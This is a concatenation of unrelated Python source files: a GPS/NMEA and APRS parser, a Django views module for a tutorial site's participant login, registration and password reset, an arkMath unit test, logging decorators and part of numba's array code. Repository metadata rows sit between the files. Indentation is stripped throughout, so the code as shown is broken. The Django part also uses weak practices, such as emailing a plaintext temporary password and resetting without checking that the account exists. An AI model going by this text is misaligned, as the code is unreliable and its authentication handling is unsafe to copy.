if position.valid and line.startswith("$GPRMC"):
self.invalid = 0
elif self.invalid < 10:
self.invalid += 1
if position.valid and self.position.valid:
self.position += position
print _("ME") + ": %s" % self.position
elif position.valid:
self.position = position
else:
print "Could not parse: %s" % line
def get_position(self):
return self.position
def status_string(self):
if self.broken:
return self.broken
elif self.invalid < 10 and self.position.satellites >= 3:
return _("GPS Locked") + " (%i sats)" % self.position.satellites
else:
return _("GPS Not Locked")
class NetworkGPSSource(GPSSource):
def __init__(self, port):
self.port = port
self.enabled = False
self.thread = None
self.position = GPSPosition()
self.last_valid = False
self.sock = None
self.broken = None
def start(self):
self.enabled = True
self.thread = threading.Thread(target=self.gpsthread)
self.thread.setDaemon(True)
self.thread.start()
def stop(self):
if self.thread and self.enabled:
self.enabled = False
self.thread.join()
def connect(self):
try:
_, host, port = self.port.split(":", 3)
port = int(port)
except ValueError, e:
print "Unable to parse %s (%s)" % (self.port, e)
self.broken = _("Unable to parse address")
return False
print "Connecting to %s:%i" % (host, port)
try:
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.connect((host, port))
self.sock.settimeout(10)
except Exception, e:
print "Unable to connect: %s" % e
self.broken = _("Unable to connect") + ": %s" % e
self.sock = None
return False
self.sock.send("r\n")
return True
def gpsthread(self):
while self.enabled:
if not self.sock:
if not self.connect():
time.sleep(1)
continue
try:
data = self.sock.recv(1024)
except Exception, e:
self.sock.close()
self.sock = None
print _("GPSd Socket closed")
continue
line = data.strip()
if not (line.startswith("$GPGGA") or \
line.startswith("$GPRMC")):
continue
pos = NMEAGPSPosition(line)
self.last_valid = pos.valid
if pos.valid and self.position.valid:
self.position += pos
elif pos.valid:
self.position = pos
else:
print "Could not parse: %s" % line
def get_position(self):
return self.position
def status_string(self):
if self.broken:
return self.broken
elif self.last_valid and self.position.satellites >= 3:
return _("GPSd Locked") + " (%i sats)" % self.position.satellites
else:
return _("GPSd Not Locked")
class StaticGPSSource(GPSSource):
def __init__(self, lat, lon, alt=0):
self.lat = lat
self.lon = lon
self.alt = alt
self.position = GPSPosition(self.lat, self.lon)
self.position.altitude = int(float(alt))
if EARTH_UNITS == "mi":
# This is kinda ugly, but assume we're given altitude in the same
# type of units as we've been asked to display
self.position.altitude = feet2meters(self.position.altitude)
def start(self):
pass
def stop(self):
pass
def get_position(self):
return self.position
def status_string(self):
return _("Static position")
def parse_GPS(string):
fixes = []
while "$" in string:
try:
if "$GPGGA" in string:
fixes.append(NMEAGPSPosition(string[string.index("$GPGGA"):]))
string = string[string.index("$GPGGA")+6:]
elif "$GPRMC" in string:
fixes.append(NMEAGPSPosition(string[string.index("$GPRMC"):]))
string = string[string.index("$GPRMC")+6:]
elif "$$CRC" in string:
return APRSGPSPosition(string[string.index("$$CRC"):])
else:
string = string[string.index("$")+1:]
except Exception, e:
print "Exception during GPS parse: %s" % e
string = string[string.index("$")+1:]
if not fixes:
return None
fix = fixes[0]
fixes = fixes[1:]
for extra in fixes:
print "Appending fix: %s" % extra
fix += extra
return fix
if __name__ == "__main__":
nmea_strings = [
"$GPRMC,010922,A,4603.6695,N,07307.3033,W,0.6,66.8,060508,16.1,W,A*1D\r\nVE2SE 9,MV [email protected]*32",
"$GPGGA,203008.78,4524.9729,N,12246.9580,W,1,03,3.8,00133,M,,,,*39",
"$GPGGA,183324.518,4533.0875,N,12254.5939,W,2,04,3.4,48.6,M,-19.6,M,1.2,0000*74",
"$GPRMC,215348,A,4529.3672,N,12253.2060,W,0.0,353.8,030508,17.5,E,D*3C",
"$GPGGA,075519,4531.254,N,12259.400,W,1,3,0,0.0,M,0,M,,*55\r\nK7HIO ,GPS Info",
"$GPRMC,074919.04,A,4524.9698,N,12246.9520,W,00.0,000.0,260508,19.,E*79",
"$GPRMC,123449.089,A,3405.1123,N,08436.4301,W,000.0,000.0,021208,,,A*71",
"$GPRMC,123449.089,A,3405.1123,N,08436.4301,W,000.0,000.0,021208,,,A*71\r\nKK7DS M,LJ DAN*C",
"$GPRMC,230710,A,2748.1414,N,08238.5556,W,000.0,033.1,111208,004.3,W*77",
]
print "-- NMEA --"
for s in nmea_strings:
p = NMEAGPSPosition(s)
if p.valid:
print "Pass: %s" % str(p)
else:
print "** FAIL: %s" % s
aprs_strings = [
"$$CRCCE3E,AE5PL-T>API282,DSTAR*:!3302.39N/09644.66W>/\r",
"$$CRC1F72,KI4IFW-1>APRATS,DSTAR*:@291930/4531.50N/12254.98W>APRS test beacon /A=000022",
"$$CRC80C3,VA2PBI>APU25N,DSTAR*:=4539.33N/07330.28W-73 de Pierre D-Star Montreal {UIV32N}",
"$$CRCA31F,VA2PBI>API282,DSTAR*:/221812z4526.56N07302.34W/\r",
'$$CRCF471,AB9FT-ML>APRATS,DSTAR*:@214235h0.00S/00000.00W>ON D-RATS at Work\r',
]
print "\n-- GPS-A --"
for s in aprs_strings:
p = APRSGPSPosition(s)
if p.valid:
print "Pass: %s" % str(p)
else:
print "** FAIL: %s" % s
| gpl-3.0 | 4,689,796,423,073,490,000 | 28.063158 | 111 | 0.489165 | false | 3.367758 | false | false | false |
kirti3192/spoken-website | mdldjango/views.py | 1 | 15036 | from django.shortcuts import render
from django.views.decorators.csrf import csrf_exempt
from django.core.context_processors import csrf
from models import MdlUser
from events.models import TrainingAttendance
from django.http import HttpResponse, HttpResponseRedirect
from django.contrib.auth.decorators import login_required
from forms import *
from django.contrib import messages
import xml.etree.cElementTree as etree
from xml.etree.ElementTree import ElementTree
# Create your views here.
import hashlib
import csv, os, time
from django.core.exceptions import PermissionDenied
from events.views import *
from events.models import *
from django.conf import settings
from events.forms import OrganiserForm
from django.core.mail import EmailMultiAlternatives
from validate_email import validate_email
from get_or_create_participant import get_or_create_participant, encript_password, check_csvfile
def authenticate(username = None, password = None):
try:
#print " i am in moodle auth"
user = MdlUser.objects.get(username=username)
#print user
pwd = user.password
p = encript_password(password)
pwd_valid = (pwd == p)
#print pwd
#print "------------"
if user and pwd_valid:
return user
except Exception, e:
#print e
#print "except ---"
return None
def mdl_logout(request):
if 'mdluserid' in request.session:
del request.session['mdluserid']
request.session.save()
#print "logout !!"
return HttpResponseRedirect('/participant/login')
def mdl_login(request):
messages = {}
if request.POST:
username = request.POST["username"]
password = request.POST["password"]
if not username or not password:
messages['error'] = "Please enter valide Username and Password!"
#return HttpResponseRedirect('/participant/login')
user = authenticate(username = username, password = password)
if user:
request.session['mdluserid'] = user.id
request.session['mdluseremail'] = user.email
request.session['mdlusername'] = user.username
request.session['mdluserinstitution'] = user.institution
request.session.save()
request.session.modified = True
else:
messages['error'] = "Username or Password Doesn't match!"
if request.session.get('mdluserid'):
#print "Current user is ", request.session.get('mdluserid')
return HttpResponseRedirect('/participant/index')
context = {'message':messages}
context.update(csrf(request))
return render(request, 'mdl/templates/mdluser_login.html', context)
def index(request):
mdluserid = request.session.get('mdluserid')
mdlusername = request.session.get('mdlusername')
if not mdluserid:
return HttpResponseRedirect('/participant/login')
try:
mdluser = MdlUser.objects.get(id=mdluserid)
except:
return HttpResponseRedirect('/participant/login')
if str(mdluser.institution).isdigit():
academic = None
try:
academic = AcademicCenter.objects.get(id = mdluser.institution)
except:
pass
if academic:
category = int(request.GET.get('category', 4))
if not (category > 0 and category < 6):
return HttpResponseRedirect('/participant/index/?category=4')
upcoming_workshop = None
upcoming_test = None
past_workshop = None
past_test = None
ongoing_test = None
if category == 3:
upcoming_workshop = Training.objects.filter((Q(status = 0) | Q(status = 1) | Q(status = 2) | Q(status = 3)), academic_id=mdluser.institution, tdate__gte=datetime.date.today()).order_by('-tdate')
if category == 5:
upcoming_test = Test.objects.filter(status=2, academic_id=mdluser.institution, tdate__gt=datetime.date.today()).order_by('-tdate')
if category == 1:
past_workshop = Training.objects.filter(id__in = TrainingAttendance.objects.filter(mdluser_id = mdluser.id).values_list('training_id'), status = 4).order_by('-tdate')
if category == 2:
past_test = Test.objects.filter(id__in = TestAttendance.objects.filter(mdluser_id = mdluser.id).values_list('test_id'), status = 4).order_by('-tdate')
if category == 4:
ongoing_test = Test.objects.filter(status=3, academic_id=mdluser.institution, tdate = datetime.date.today()).order_by('-tdate')
print past_workshop, "******************8"
context = {
'mdluserid' : mdluserid,
'mdlusername' : mdlusername,
'upcoming_workshop' : upcoming_workshop,
'upcoming_test' : upcoming_test,
'past_workshop' : past_workshop,
'past_test' : past_test,
'ongoing_test' : ongoing_test,
'category' : category,
'ONLINE_TEST_URL' : settings.ONLINE_TEST_URL
}
context.update(csrf(request))
return render(request, 'mdl/templates/mdluser_index.html', context)
form = OrganiserForm()
if request.method == 'POST':
form = OrganiserForm(request.POST)
if form.is_valid():
mdluser.institution = form.cleaned_data['college']
mdluser.save()
return HttpResponseRedirect('/participant/index')
context = {
'form' : form
}
context.update(csrf(request))
return render(request, 'mdl/templates/academic.html', context)
@login_required
def offline_details(request, wid, category):
user = request.user
wid = int(wid)
category = int(category)
#print category
user = request.user
form = OfflineDataForm()
try:
if category == 1:
Training.objects.get(pk=wid, status__lt=4)
elif category == 2:
Training.objects.get(pk=wid, status__lt=4)
else:
raise PermissionDenied('You are not allowed to view this page!')
except Exception, e:
raise PermissionDenied('You are not allowed to view this page!')
if request.method == 'POST':
form = OfflineDataForm(request.POST, request.FILES)
try:
if category == 1:
w = Training.objects.get(id = wid)
elif category == 2:
w = Training.objects.get(id = wid)
else:
raise PermissionDenied('You are not allowed to view this page!')
except:
raise PermissionDenied('You are not allowed to view this page!')
if form.is_valid():
file_path = settings.MEDIA_ROOT + 'training/' + str(wid) + str(time.time())
f = request.FILES['xml_file']
fout = open(file_path, 'wb+')
for chunk in f.chunks():
fout.write(chunk)
fout.close()
error_line_no = ''
csv_file_error = 0
csv_file_error, error_line_no = check_csvfile(user, file_path, w, flag=1)
os.unlink(file_path)
#update participant count
update_participants_count(w)
if error_line_no:
messages.error(request, error_line_no)
#update logs
if category == 1:
message = w.academic.institution_name+" has submited Offline "+w.foss.foss+" workshop attendance dated "+w.tdate.strftime("%Y-%m-%d")
update_events_log(user_id = user.id, role = 2, category = 0, category_id = w.id, academic = w.academic_id, status = 5)
update_events_notification(user_id = user.id, role = 2, category = 0, category_id = w.id, academic = w.academic_id, status = 5, message = message)
if not error_line_no:
messages.success(request, "Thank you for uploading the Attendance. Now make sure that you cross check and verify the details before submiting.")
return HttpResponseRedirect('/software-training/workshop/'+str(wid)+'/attendance/')
else:
message = w.academic.institution_name+" has submited Offline training attendance."
update_events_log(user_id = user.id, role = 2, category = 2, category_id = w.id, academic = w.academic_id, status = 5)
update_events_notification(user_id = user.id, role = 2, category = 2, category_id = w.id, academic = w.academic_id, status = 5, message = message)
if not error_line_no:
messages.success(request, "Thank you for uploading the Attendance. Now make sure that you cross check and verify the details before submiting.")
return HttpResponseRedirect('/software-training/training/'+str(wid)+'/attendance/')
messages.error(request, "Please Upload CSV file !")
context = {
'form': form,
}
messages.info(request, """
Please upload the CSV file which you have generated.
To know more <a href="http://process.spoken-tutorial.org/images/9/96/Upload_Attendance.pdf" target="_blank">Click here</a>.
""")
context.update(csrf(request))
return render(request, 'mdl/templates/offline_details.html', context)
def mdl_register(request):
form = RegisterForm()
if request.method == "POST":
form = RegisterForm(request.POST)
#Email exits
try:
user = MdlUser.objects.filter(email=request.POST['email']).first()
if user:
messages.success(request, "Email : "+request.POST['email']+" already registered on this website. Please click <a href='http://www.spoken-tutorial.org/participant/login/'>here </a>to login")
except Exception, e:
#print e
pass
if form.is_valid():
mdluser = MdlUser()
mdluser.auth = 'manual'
mdluser.institution = form.cleaned_data['college']
mdluser.gender = form.cleaned_data['gender']
mdluser.firstname = form.cleaned_data['firstname']
mdluser.lastname = form.cleaned_data['lastname']
mdluser.email = form.cleaned_data['email']
mdluser.username = form.cleaned_data['username']
mdluser.password = encript_password(form.cleaned_data['password'])
mdluser.confirmed = 1
mdluser.mnethostid = 1
mdluser.save()
messages.success(request, "User " + form.cleaned_data['firstname'] +" "+form.cleaned_data['lastname']+" Created!")
return HttpResponseRedirect('/participant/register/')
context = {}
context['form'] = form
context.update(csrf(request))
return render(request, 'mdl/templates/register.html', context)
def feedback(request, wid):
mdluserid = request.session.get('mdluserid')
mdlusername = request.session.get('mdlusername')
if not mdluserid:
return HttpResponseRedirect('/participant/login')
form = FeedbackForm()
mdluserid = request.session.get('mdluserid')
if not mdluserid:
return HttpResponseRedirect('/participant/login')
w = None
try:
w = Training.objects.select_related().get(pk=wid)
#check if feedback already exits
TrainingFeedback.objects.get(training_id = wid, mdluser_id = mdluserid)
messages.success(request, "We have already received your feedback. ")
return HttpResponseRedirect('/participant/index/?category=1')
except Exception, e:
#print e
pass
if request.method == 'POST':
form = FeedbackForm(request.POST)
if form.is_valid():
try:
form_data = form.save(commit=False)
form_data.training_id = wid
form_data.mdluser_id = mdluserid
form_data.save()
try:
wa = TrainingAttendance.objects.get(mdluser_id=mdluserid, training_id = wid)
wa.status = 2
wa.save()
except:
wa = TrainingAttendance()
wa.training_id = wid
wa.mdluser_id = mdluserid
wa.status = 1
wa.save()
messages.success(request, "Thank you for your valuable feedback.")
return HttpResponseRedirect('/participant/index/?category=1')
except Exception, e:
print e
pass
#return HttpResponseRedirect('/participant/index/')
context = {
'form' : form,
'w' : w,
'mdluserid' : mdluserid,
'mdlusername' : mdlusername,
}
context.update(csrf(request))
return render(request, 'mdl/templates/feedback.html', context)
def forget_password(request):
context = {}
form = PasswordResetForm()
if request.method == "POST":
form = PasswordResetForm(request.POST)
if form.is_valid():
password_string = ''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(8))
user = MdlUser.objects.filter(email=request.POST['email']).first()
password_encript = encript_password(password_string)
user.password = password_encript
user.save()
subject = "Spoken Tutorial Online Test password reset"
to = [user.email]
message = '''Hi {0},
Your account password at 'Spoken Tutorials Online Test Center' has been reset
and you have been issued with a new temporary password.
Your current login information is now:
username: {1}
password: {2}
Please go to this page to change your password:
{3}
In most mail programs, this should appear as a blue link
which you can just click on. If that doesn't work,
then cut and paste the address into the address
line at the top of your web browser window.
Cheers from the 'Spoken Tutorials Online Test Center' administrator,
Admin Spoken Tutorials
'''.format(user.firstname, user.username, password_string, 'http://onlinetest.spoken-tutorial.org/login/change_password.php')
# send email
email = EmailMultiAlternatives(
subject, message, '[email protected]',
to = to, bcc = [], cc = [],
headers={'Reply-To': '[email protected]', "Content-type":"text/html;charset=iso-8859-1"}
)
result = email.send(fail_silently=False)
messages.success(request, "New password sent to your email "+user.email)
return HttpResponseRedirect('/participant/login/')
context = {
'form': form
}
context.update(csrf(request))
return render(request, 'mdl/templates/password_reset.html', context)
| gpl-3.0 | 2,444,503,224,367,037,000 | 41.235955 | 210 | 0.60415 | false | 4.061588 | true | false | false |
IngenuityEngine/arkMath | test/test_helpers.py | 1 | 2374 |
# Standard modules
from expects import *
# Our modules
import arkInit
arkInit.init()
import tryout
import arkMath
from arkMath import Mat44
class test(tryout.TestSuite):
title = 'test/test_helpers.py'
def is_vector(self):
vec = arkMath.Vec(1,2,3,4)
self.assertEqual(arkMath.isVector(vec), True)
self.assertEqual(arkMath.isVector(12), False)
def ensure_vector(self):
vec = arkMath.Vec(1,2,3,4)
ensured = arkMath.ensureVector(vec)
self.assertEqual(ensured.x, vec.x)
ensured = arkMath.ensureVector(12)
self.assertEqual(ensured.x, 12)
self.assertEqual(ensured.y, 0)
ensured = arkMath.ensureVector(12, 5, 4, 9)
self.assertEqual(ensured.x, 12)
self.assertEqual(ensured.y, 5)
self.assertEqual(ensured.z, 4)
self.assertEqual(ensured.w, 9)
ensured = arkMath.ensureVector([15, 25, 7, 2])
self.assertEqual(ensured.x, 15)
self.assertEqual(ensured.y, 25)
self.assertEqual(ensured.z, 7)
self.assertEqual(ensured.w, 2)
def is_matrix(self):
matList = [1.0, 0.0, 0.0, 0.0, 0.0, 1.0, 0.0, 0.0, 0.0, 0.0, 1.0, 0.0, 0.0, 0.0, 0.0, 1.0]
matFromList = Mat44(matList)
vec1 = arkMath.Vec(1.0, 0.0, 0.0, 0.0)
vec2 = arkMath.Vec(0.0, 1.0, 0.0, 0.0)
vec3 = arkMath.Vec(0.0, 0.0, 1.0, 0.0)
vec4 = arkMath.Vec(0.0, 0.0, 0.0, 1.0)
matFromVecs = Mat44(vec1, vec2, vec3, vec4)
justVec = arkMath.Vec(1, 2, 3, 4)
self.assertEqual(arkMath.isMatrix(matFromList), True)
self.assertEqual(arkMath.isMatrix(matFromVecs), True)
self.assertEqual(arkMath.isMatrix(justVec), False)
# Should work if input already a matrix, 4 vectors, or 16 matrix values
def ensure_matrix(self):
matList = [1.0, 0.0, 0.0, 0.0, 0.0, 1.0, 0.0, 0.0, 0.0, 0.0, 1.0, 0.0, 0.0, 0.0, 0.0, 1.0]
goalMat = Mat44(matList)
sixteenMat = arkMath.ensureMatrix(1.0, 0.0, 0.0, 0.0, 0.0, 1.0, 0.0, 0.0, 0.0, 0.0, 1.0, 0.0, 0.0, 0.0, 0.0, 1.0)
self.assertEqual(type(sixteenMat), type(goalMat))
vec1 = arkMath.Vec(1.0, 0.0, 0.0, 0.0)
vec2 = arkMath.Vec(0.0, 1.0, 0.0, 0.0)
vec3 = arkMath.Vec(0.0, 0.0, 1.0, 0.0)
vec4 = arkMath.Vec(0.0, 0.0, 0.0, 1.0)
vecsMat = arkMath.ensureMatrix(vec1, vec2, vec3, vec4)
self.assertEqual(type(vecsMat), type(goalMat))
# Ensure_matrix of already matrix should just return itself
selfMat = arkMath.ensureMatrix(goalMat)
self.assertEqual(type(selfMat), type(goalMat))
if __name__ == '__main__':
tryout.run(test)
| mit | 8,659,748,860,809,815,000 | 29.831169 | 115 | 0.667228 | false | 2.212488 | false | false | false |
leingang/plg | plg/utils/decorators.py | 1 | 1819 | #!/usr/bin/env python
import logging
def debug_entry(f):
"""
debug the entry into a function
>>> import sys
>>> import logging
The stream configuration is just to make doctests work.
In practice, you'd probably want the default stream sys.stderr.
>>> logging.basicConfig(level=logging.DEBUG,stream=sys.stdout)
>>> @debug_entry
... def f(x):
... return x*x
...
>>> f(2)
DEBUG:f:Entering: arguments=(2,), keyword arguments={}
4
"""
def new_f(*args,**kwargs):
logger=logging.getLogger(f.__name__)
logger.debug("Entering: arguments=%s, keyword arguments=%s",args,kwargs)
return f(*args,**kwargs)
new_f.__name__ = f.__name__
return new_f
def debug_result(f):
"""
Debug the result of a function
>>> import sys
>>> import logging
>>> logging.basicConfig(level=logging.DEBUG,stream=sys.stdout)
>>> @debug_result
... def f(x):
... return x*x
...
>>> f(2)+10
DEBUG:f:Result: 4
14
Decorators can be chained (that's kind of the point!).
>>> @debug_entry
... @debug_result
... def g(x):
... return 2*x
...
>>> g(3)+17
DEBUG:g:Entering: arguments=(3,), keyword arguments={}
DEBUG:g:Result: 6
23
"""
def new_f(*args,**kwargs):
logger=logging.getLogger(f.__name__)
result=f(*args,**kwargs)
logger.debug("Result: %s",repr(result))
return result
new_f.__name__ = f.__name__
return new_f
if __name__ == "__main__":
import doctest
doctest.testmod()
# from decorators import *
# import logging
# logging.basicConfig(level=logging.DEBUG)
# @debug_result
# @debug_entry
# def f(x):
# return x*x
#
#f(2) | gpl-3.0 | 2,352,242,054,812,354,000 | 22.333333 | 80 | 0.548103 | false | 3.674747 | false | false | false |
pitrou/numba | numba/targets/arrayobj.py | 1 | 109012 | """
Implementation of operations on Array objects and objects supporting
the buffer protocol.
"""
from __future__ import print_function, absolute_import, division
import math
import llvmlite.llvmpy.core as lc
from llvmlite.llvmpy.core import Constant
import numpy
from numba import types, cgutils, typing
from numba.numpy_support import as_dtype
from numba.numpy_support import version as numpy_version
from numba.targets.imputils import (builtin, builtin_attr, implement,
impl_attribute, impl_attribute_generic,
iternext_impl, impl_ret_borrowed,
impl_ret_new_ref, impl_ret_untracked)
from numba.typing import signature
from . import quicksort, slicing
def increment_index(builder, val):
"""
Increment an index *val*.
"""
one = Constant.int(val.type, 1)
# We pass the "nsw" flag in the hope that LLVM understands the index
# never changes sign. Unfortunately this doesn't always work
# (e.g. ndindex()).
return builder.add(val, one, flags=['nsw'])
def set_range_metadata(builder, load, lower_bound, upper_bound):
"""
Set the "range" metadata on a load instruction.
Note the interval is in the form [lower_bound, upper_bound).
"""
range_operands = [Constant.int(load.type, lower_bound),
Constant.int(load.type, upper_bound)]
md = builder.module.add_metadata(range_operands)
load.set_metadata("range", md)
def mark_positive(builder, load):
"""
Mark the result of a load instruction as positive (or zero).
"""
upper_bound = (1 << (load.type.width - 1)) - 1
set_range_metadata(builder, load, 0, upper_bound)
def make_array(array_type):
"""
Return the Structure representation of the given *array_type*
(an instance of types.Array).
"""
base = cgutils.create_struct_proxy(array_type)
ndim = array_type.ndim
class ArrayStruct(base):
@property
def shape(self):
"""
Override .shape to inform LLVM that its elements are all positive.
"""
builder = self._builder
if ndim == 0:
return base.__getattr__(self, "shape")
# Unfortunately, we can't use llvm.assume as its presence can
# seriously pessimize performance,
# *and* the range metadata currently isn't improving anything here,
# see https://llvm.org/bugs/show_bug.cgi?id=23848 !
ptr = self._get_ptr_by_name("shape")
dims = []
for i in range(ndim):
dimptr = cgutils.gep_inbounds(builder, ptr, 0, i)
load = builder.load(dimptr)
dims.append(load)
mark_positive(builder, load)
return cgutils.pack_array(builder, dims)
return ArrayStruct
def get_itemsize(context, array_type):
"""
Return the item size for the given array or buffer type.
"""
llty = context.get_data_type(array_type.dtype)
return context.get_abi_sizeof(llty)
def load_item(context, builder, arrayty, ptr):
"""
Load the item at the given array pointer.
"""
align = None if arrayty.aligned else 1
return context.unpack_value(builder, arrayty.dtype, ptr,
align=align)
def store_item(context, builder, arrayty, val, ptr):
"""
Store the item at the given array pointer.
"""
align = None if arrayty.aligned else 1
return context.pack_value(builder, arrayty.dtype, val, ptr, align=align)
def fix_integer_index(context, builder, idxty, idx, size):
"""
Fix the integer index' type and value for the given dimension size.
"""
if idxty.signed:
ind = context.cast(builder, idx, idxty, types.intp)
ind = slicing.fix_index(builder, ind, size)
else:
ind = context.cast(builder, idx, idxty, types.uintp)
return ind
def populate_array(array, data, shape, strides, itemsize, meminfo,
parent=None):
"""
Helper function for populating array structures.
This avoids forgetting to set fields.
*shape* and *strides* can be Python tuples or LLVM arrays.
"""
context = array._context
builder = array._builder
datamodel = array._datamodel
required_fields = set(datamodel._fields)
if meminfo is None:
meminfo = Constant.null(context.get_value_type(
datamodel.get_type('meminfo')))
intp_t = context.get_value_type(types.intp)
if isinstance(shape, (tuple, list)):
shape = cgutils.pack_array(builder, shape, intp_t)
if isinstance(strides, (tuple, list)):
strides = cgutils.pack_array(builder, strides, intp_t)
attrs = dict(shape=shape,
strides=strides,
data=data,
itemsize=itemsize,
meminfo=meminfo,)
# Set `parent` attribute
if parent is None:
attrs['parent'] = Constant.null(context.get_value_type(
datamodel.get_type('parent')))
else:
attrs['parent'] = parent
# Calc num of items from shape
nitems = context.get_constant(types.intp, 1)
unpacked_shape = cgutils.unpack_tuple(builder, shape, shape.type.count)
if unpacked_shape:
# Shape is not empty
for axlen in unpacked_shape:
nitems = builder.mul(nitems, axlen)
else:
# Shape is empty
nitems = context.get_constant(types.intp, 1)
attrs['nitems'] = nitems
# Make sure that we have all the fields
got_fields = set(attrs.keys())
if got_fields != required_fields:
raise ValueError("missing {0}".format(required_fields - got_fields))
# Set field value
for k, v in attrs.items():
setattr(array, k, v)
return array
def update_array_info(aryty, array):
"""
Update some auxiliary information in *array* after some of its fields
were changed. `itemsize` and `nitems` are updated.
"""
context = array._context
builder = array._builder
# Calc num of items from shape
nitems = context.get_constant(types.intp, 1)
unpacked_shape = cgutils.unpack_tuple(builder, array.shape, aryty.ndim)
for axlen in unpacked_shape:
nitems = builder.mul(nitems, axlen)
array.nitems = nitems
array.itemsize = context.get_constant(types.intp,
get_itemsize(context, aryty))
def make_arrayiter_cls(iterator_type):
"""
Return the Structure representation of the given *iterator_type* (an
instance of types.ArrayIteratorType).
"""
return cgutils.create_struct_proxy(iterator_type)
@builtin
@implement('getiter', types.Kind(types.Buffer))
def getiter_array(context, builder, sig, args):
[arrayty] = sig.args
[array] = args
iterobj = make_arrayiter_cls(sig.return_type)(context, builder)
zero = context.get_constant(types.intp, 0)
indexptr = cgutils.alloca_once_value(builder, zero)
iterobj.index = indexptr
iterobj.array = array
# Incref array
if context.enable_nrt:
context.nrt_incref(builder, arrayty, array)
res = iterobj._getvalue()
# Note: a decref on the iterator will dereference all internal MemInfo*
out = impl_ret_new_ref(context, builder, sig.return_type, res)
return out
def _getitem_array1d(context, builder, arrayty, array, idx, wraparound):
"""
Look up and return an element from a 1D array.
"""
ptr = cgutils.get_item_pointer(builder, arrayty, array, [idx],
wraparound=wraparound)
return load_item(context, builder, arrayty, ptr)
@builtin
@implement('iternext', types.Kind(types.ArrayIterator))
@iternext_impl
def iternext_array(context, builder, sig, args, result):
[iterty] = sig.args
[iter] = args
arrayty = iterty.array_type
if arrayty.ndim != 1:
# TODO
raise NotImplementedError("iterating over %dD array" % arrayty.ndim)
iterobj = make_arrayiter_cls(iterty)(context, builder, value=iter)
ary = make_array(arrayty)(context, builder, value=iterobj.array)
nitems, = cgutils.unpack_tuple(builder, ary.shape, count=1)
index = builder.load(iterobj.index)
is_valid = builder.icmp(lc.ICMP_SLT, index, nitems)
result.set_valid(is_valid)
with builder.if_then(is_valid):
value = _getitem_array1d(context, builder, arrayty, ary, index,
wraparound=False)
result.yield_(value)
nindex = builder.add(index, context.get_constant(types.intp, 1))
builder.store(nindex, iterobj.index)
#-------------------------------------------------------------------------------
# Basic indexing (with integers and slices only)
def basic_indexing(context, builder, aryty, ary, index_types, indices):
"""
Perform basic indexing on the given array.
A (data pointer, shapes, strides) tuple is returned describing
the corresponding view.
"""
zero = context.get_constant(types.intp, 0)
shapes = cgutils.unpack_tuple(builder, ary.shape, aryty.ndim)
strides = cgutils.unpack_tuple(builder, ary.strides, aryty.ndim)
output_indices = []
output_shapes = []
output_strides = []
ax = 0
for indexval, idxty in zip(indices, index_types):
if idxty is types.ellipsis:
# Fill up missing dimensions at the middle
n_missing = aryty.ndim - len(indices) + 1
for i in range(n_missing):
output_indices.append(zero)
output_shapes.append(shapes[ax])
output_strides.append(strides[ax])
ax += 1
continue
# Regular index value
if idxty == types.slice3_type:
slice = slicing.Slice(context, builder, value=indexval)
cgutils.guard_invalid_slice(context, builder, slice)
slicing.fix_slice(builder, slice, shapes[ax])
output_indices.append(slice.start)
sh = slicing.get_slice_length(builder, slice)
st = slicing.fix_stride(builder, slice, strides[ax])
output_shapes.append(sh)
output_strides.append(st)
elif isinstance(idxty, types.Integer):
ind = fix_integer_index(context, builder, idxty, indexval,
shapes[ax])
output_indices.append(ind)
else:
raise NotImplementedError("unexpected index type: %s" % (idxty,))
ax += 1
# Fill up missing dimensions at the end
assert ax <= aryty.ndim
while ax < aryty.ndim:
output_shapes.append(shapes[ax])
output_strides.append(strides[ax])
ax += 1
# No need to check wraparound, as negative indices were already
# fixed in the loop above.
dataptr = cgutils.get_item_pointer(builder, aryty, ary,
output_indices,
wraparound=False)
return (dataptr, output_shapes, output_strides)
def make_view(context, builder, aryty, ary, return_type,
data, shapes, strides):
"""
Build a view over the given array with the given parameters.
"""
retary = make_array(return_type)(context, builder)
populate_array(retary,
data=data,
shape=shapes,
strides=strides,
itemsize=ary.itemsize,
meminfo=ary.meminfo,
parent=ary.parent)
return retary
def _getitem_array_generic(context, builder, return_type, aryty, ary,
index_types, indices):
"""
Return the result of indexing *ary* with the given *indices*.
"""
assert isinstance(return_type, types.Buffer)
dataptr, view_shapes, view_strides = \
basic_indexing(context, builder, aryty, ary, index_types, indices)
# Build array view
retary = make_view(context, builder, aryty, ary, return_type,
dataptr, view_shapes, view_strides)
return retary._getvalue()
@builtin
@implement('getitem', types.Kind(types.Buffer), types.Kind(types.Integer))
def getitem_arraynd_intp(context, builder, sig, args):
aryty, idxty = sig.args
ary, idx = args
ary = make_array(aryty)(context, builder, ary)
dataptr, shapes, strides = \
basic_indexing(context, builder, aryty, ary, (idxty,), (idx,))
ndim = aryty.ndim
if ndim == 1:
# Return a value
assert not shapes
result = load_item(context, builder, aryty, dataptr)
elif ndim > 1:
# Return a subview over the array
out_ary = make_view(context, builder, aryty, ary, sig.return_type,
dataptr, shapes, strides)
result = out_ary._getvalue()
else:
raise NotImplementedError("1D indexing into %dD array" % aryty.ndim)
return impl_ret_borrowed(context, builder, sig.return_type, result)
@builtin
@implement('getitem', types.Kind(types.Buffer), types.slice3_type)
def getitem_array1d_slice(context, builder, sig, args):
aryty, idxty = sig.args
ary, idx = args
ary = make_array(aryty)(context, builder, value=ary)
res = _getitem_array_generic(context, builder, sig.return_type,
aryty, ary, (idxty,), (idx,))
return impl_ret_borrowed(context, builder, sig.return_type, res)
@builtin
@implement('getitem', types.Kind(types.Buffer), types.Kind(types.BaseTuple))
def getitem_array_tuple(context, builder, sig, args):
aryty, tupty = sig.args
ary, tup = args
ary = make_array(aryty)(context, builder, ary)
index_types = tupty.types
indices = cgutils.unpack_tuple(builder, tup, count=len(tupty))
if any(isinstance(ty, types.Array) for ty in index_types):
return fancy_getitem(context, builder, sig, args,
aryty, ary, index_types, indices)
dataptr, shapes, strides = \
basic_indexing(context, builder, aryty, ary, index_types, indices)
ndim = aryty.ndim
if isinstance(sig.return_type, types.Array):
# Generic array slicing
res = make_view(context, builder, aryty, ary, sig.return_type,
dataptr, shapes, strides)
res = res._getvalue()
else:
# Plain indexing (returning a scalar)
assert not shapes
res = load_item(context, builder, aryty, dataptr)
return impl_ret_borrowed(context, builder ,sig.return_type, res)
@builtin
@implement('setitem', types.Kind(types.Buffer), types.Any, types.Any)
def setitem_array(context, builder, sig, args):
"""
array[a] = scalar_or_array
array[a,..,b] = scalar_or_array
"""
